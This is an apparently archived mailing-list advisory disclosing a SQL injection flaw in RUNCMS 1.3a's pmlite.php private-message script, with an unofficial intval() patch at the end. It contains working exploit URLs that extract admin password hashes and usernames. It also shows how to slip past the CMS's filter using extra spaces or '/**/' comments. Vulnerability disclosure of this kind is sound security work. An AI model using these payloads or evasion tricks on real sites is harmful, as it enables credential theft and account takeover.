<<< Date Index >>>     <<< Thread Index >>>

RUNCMS 1.3a SQL injection



refrence:
http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18
http://hamid.ir/security/
-----------------------------------------------
RUNCMS 1.3a SQL injection
Runcms Includes most things a webmaster would expect
from a cms: downloads, links, tutorials section,
polls, forums, news,
faq, contact form, rss feeds, file uploads, blogging
via xml-rpc, & more. Possibility to manage users as
groups with module/block specific access permissions,
and extend functioality via 3rd party module plug-ins
and ...
Original Author: The Xoops Project
http://www.xoops.org
http://www.runcms.org

Credit:
The information has been provided by Hamid Ebadi 
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
tested on  RUNCMS 1.3a  and  RUNCM 1.2 (and below ?)

Detail ::
Send Private Message
The following URL can be used to trigger an SQL
injection vulnerability in the pmlite.php [ but no
error will disply  ! ]
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL
INJECTION]

http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1
union select pass from runcms_users
internal RUNCMS protection will block this request and
redirect your browser to http://localhost/abuse.php 
and you will see this warning:

                " WARNING !!!!!! You were trying to abuse the
system, a logfile was created ..." 

what is the problem ? 
Bypassing  Protection :
as i underestand RUNCMS just filter  (union select)
and (union all select) and ....!  but they forgot 
(union       select)  !
exploit:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
there is another way to bypass runcms internal
protection  simply add " /**/ "  in your query 
exploit will be something like this  :
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir

Unofficial Patch:
line 33 : pmlite.php
$to_userid = !empty($_POST['to_userid']) ?
$_POST['to_userid'] : $_GET['to_userid'];
// Hamid Ebadi (hamid Network Security Team): patch
for RUNCMS 1.3a and below .
$to_userid=intval($to_userid); //add this line plz
HAMID
$send = $_POST['send'];



Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com